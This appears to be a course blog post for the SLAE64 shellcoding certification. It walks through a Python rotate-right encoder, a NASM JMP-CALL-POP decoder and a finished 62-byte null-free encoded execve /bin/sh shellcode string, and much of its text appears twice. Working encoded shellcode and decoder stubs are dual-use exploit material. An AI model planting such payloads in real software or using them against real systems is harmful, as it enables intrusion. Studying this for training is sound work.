This post is a continuation of a seven (7) part blog series as part of the SLAE64 certification challenge. You can read the previous blog posts using the links below.
Previous Posts:
The requirements for Assignment 4 are as follows:
Supplemental scripts for this assignment can be found here: https://github.com/blu3gl0w13/SLAE64/tree/master/scripts.
For this one, we re-used a nice python script we made for SLAE32 based off of a function found here: http://www.falatic.com/index.php/108/python-and-bitwise-rotation
We did this because there really wasn't a pre-existing bitwise rotation functionality already built into Python. It winds up working out really well actually. This script will define two (2) functions ror for rotate right, and rol for rotate left. We'll use the ror function to rotate each bit within our shellcode by 2 places. When we write our decoder in NASM, we'll need to perform the opposite operation and rotate our encoded shellcode two (2) places left using rol, so that we return our shellcode to its original working state.

Now that we've gotten our encoder.py written and working, we can focus on writing our decoder script. It definitely doesn't have to be very long either. For this script, we'll employ the JMP, CALL, POP technique to dynamical retrieve the address of our encoded shellcode. We first JMP to our shellcode label, then CALL our decoder label. This has the effect of pushing the address to encShellcode onto the stack when the CALL happens. That's because the address to encShellcode is already in RIP because it's the next instruction following the CALL. Following a CALL instruction, RIP is pushed onto the stack. Pretty cool right?
Our first instruction in our decoder block is to POP that address off of the stack into RSI. This is for easy reference later in the script as we loop through our decode instructions. We'll next initialize RCX using an XOR instruction, and will then copy the length of our encShellcode into CL. Remember, in x86_64 assembly, RCX is used as a loop counter. We only want to loop through the length of the our encoded shellcode so that we don't accidentally overwrite adjacent areas of memory. Finally, to finish our decoder section, we'll initialize RDX in order to use it as a temporary holder for each byte of our encoded shellcode. Our decode block actually handles the decoding. We move one byte at a time into DL, rotate it left two positions, and then return it to its location pointed to by RSI. We then increase the address in RSI by one and, as long as RCX isn't zero, use the LOOP instruction to start the process over again. This continues until RCX is zero (ZF set) and we JMP SHORT into our now decoded shellcode.
Here's what the decoder shellcode looks like. Notice any NULL bytes? You shouldn't because we were extra careful to make sure no NULL bytes made it into our decoder.
When we compile and run the decoder-execve.nasm script we get a Segmentation Fault. Why is that? It's because we're trying to write to read only memory! Look at Figure 2 below and see that as soon as we try to execute MOV byte [RSI], dl the program freaks out.

How can we take care of this. One way is to dump the shellcode from our compiled decoder-execve.nasm script, and put it into a C program. We'll then compile the C program to allow execution in normally write protected areas of memory. This way we can test to see if our shellcode works. And guess what? It does! And, probably the best part, it's only 62 bytes! Fantastic.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert 64-bit certification:
http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
Student ID: SLAE64 - 1439
Next: SLAE64 - Assignment 5
Previous Posts:
The requirements for Assignment 4 are as follows:
- Create a Custom encoding scheme like the "Insertion Encoder" we showed you
- PoC with using execve-stack as the shellcode to encode with your schema and execute
Supplemental scripts for this assignment can be found here: https://github.com/blu3gl0w13/SLAE64/tree/master/scripts.
For this one, we re-used a nice python script we made for SLAE32 based off of a function found here: http://www.falatic.com/index.php/108/python-and-bitwise-rotation
We did this because there really wasn't a pre-existing bitwise rotation functionality already built into Python. It winds up working out really well actually. This script will define two (2) functions ror for rotate right, and rol for rotate left. We'll use the ror function to rotate each bit within our shellcode by 2 places. When we write our decoder in NASM, we'll need to perform the opposite operation and rotate our encoded shellcode two (2) places left using rol, so that we return our shellcode to its original working state.
#!/usr/bin/env python
#-----------------------------------------------------------------------------
#
# encoder.py
# by Michael Born (@blu3gl0w13)
# Student-ID: SLAE64-1439
# November 8, 2016
#
#----------------------------------------------------------------------------
# handle our imports
import sys
#-------------------------------------------------------------------
# The following Bitwise rotation functions
# have been translated from the following blog
# http://www.falatic.com/index.php/108/python-and-bitwise-rotation
#-------------------------------------------------------------------
def ror(valueToBeRotated, rotateAmount):
return ((valueToBeRotated & 0xff) >> rotateAmount % 8) |
(valueToBeRotated << (8 - (rotateAmount % 8)) & 0xff)
def rol(valueToBeRotated, rotateAmount):
return ((valueToBeRotated << (rotateAmount % 8)) & 0xff) |
((valueToBeRotated & 0xff) >> (8 - (rotateAmount % 8)))
shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53
\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")
encshellcode = ""
encshellcode2 = ""
for i in bytearray(shellcode):
x = ror(i, 2)
#x = i >> 2
encshellcode += "\\x%02x," % x
encshellcode2 += "0x%02x," % x
print "\n\nEncoded Shellcode: %s" % encshellcode
print "Encoded Shellcode 2: %s\n\n" % encshellcode2
When we run encoder.py to encode our Execve shellcode we get the output in Figure 1. This is excellent because we don't have any NULL bytes which is important because NULL bytes usually represent bad characters in shellcode when used in an exploit.
Now that we've gotten our encoder.py written and working, we can focus on writing our decoder script. It definitely doesn't have to be very long either. For this script, we'll employ the JMP, CALL, POP technique to dynamical retrieve the address of our encoded shellcode. We first JMP to our shellcode label, then CALL our decoder label. This has the effect of pushing the address to encShellcode onto the stack when the CALL happens. That's because the address to encShellcode is already in RIP because it's the next instruction following the CALL. Following a CALL instruction, RIP is pushed onto the stack. Pretty cool right?
Our first instruction in our decoder block is to POP that address off of the stack into RSI. This is for easy reference later in the script as we loop through our decode instructions. We'll next initialize RCX using an XOR instruction, and will then copy the length of our encShellcode into CL. Remember, in x86_64 assembly, RCX is used as a loop counter. We only want to loop through the length of the our encoded shellcode so that we don't accidentally overwrite adjacent areas of memory. Finally, to finish our decoder section, we'll initialize RDX in order to use it as a temporary holder for each byte of our encoded shellcode. Our decode block actually handles the decoding. We move one byte at a time into DL, rotate it left two positions, and then return it to its location pointed to by RSI. We then increase the address in RSI by one and, as long as RCX isn't zero, use the LOOP instruction to start the process over again. This continues until RCX is zero (ZF set) and we JMP SHORT into our now decoded shellcode.
;-------------------------------
; decoder-execve.nasm
; by Michael Born (@blu3gl0w13)
; November 8, 2016
; Student ID: SLAE64-1439
;-------------------------------
global _start
section .text
_start:
; JMP CALL POP
; to get address of our
; encoded shellcode
jmp shellcode
decoder:
pop rsi
xor rcx, rcx
mov cl, shellLen
xor rdx, rdx
decode:
mov dl, byte [rsi]
rol dl, 0x2
mov byte [rsi], dl
inc rsi
loop decode
jmp short encShellcode
shellcode:
call decoder
encShellcode: db 0x12,0x4c,0x30,0x14,0x12,0xee,0xcb,0x98,0x5a,0x9b,0xcb,0xcb,\
0xdc,0x1a,0xd4,0x12,0x62,0xf9,0x14,0x12,0x62,0xb8,0xd5,0x12,0x62,0xb9,0x12,0xe0,0x30,0xce,0xc3,0x41
shellLen: equ $-encShellcode
Here's what the decoder shellcode looks like. Notice any NULL bytes? You shouldn't because we were extra careful to make sure no NULL bytes made it into our decoder.
"\xeb\x17\x5e\x48\x31\xc9\xb1\x20\x48\x31\xd2\x8a\x16\xc0\xc2\x02\x88\x16\x48\xff\xc6"
"\xe2\xf4\xeb\x05\xe8\xe4\xff\xff\xff\x12\x4c\x30\x14\x12\xee\xcb\x98\x5a\x9b\xcb\xcb"
"\xdc\x1a\xd4\x12\x62\xf9\x14\x12\x62\xb8\xd5\x12\x62\xb9\x12\xe0\x30\xce\xc3\x41"
When we compile and run the decoder-execve.nasm script we get a Segmentation Fault. Why is that? It's because we're trying to write to read only memory! Look at Figure 2 below and see that as soon as we try to execute MOV byte [RSI], dl the program freaks out.

How can we take care of this. One way is to dump the shellcode from our compiled decoder-execve.nasm script, and put it into a C program. We'll then compile the C program to allow execution in normally write protected areas of memory. This way we can test to see if our shellcode works. And guess what? It does! And, probably the best part, it's only 62 bytes! Fantastic.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert 64-bit certification:
http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
Student ID: SLAE64 - 1439
Next: SLAE64 - Assignment 5
Comments
Post a Comment
Please leave a comment. Keep it on topic and appropriate for all audiences.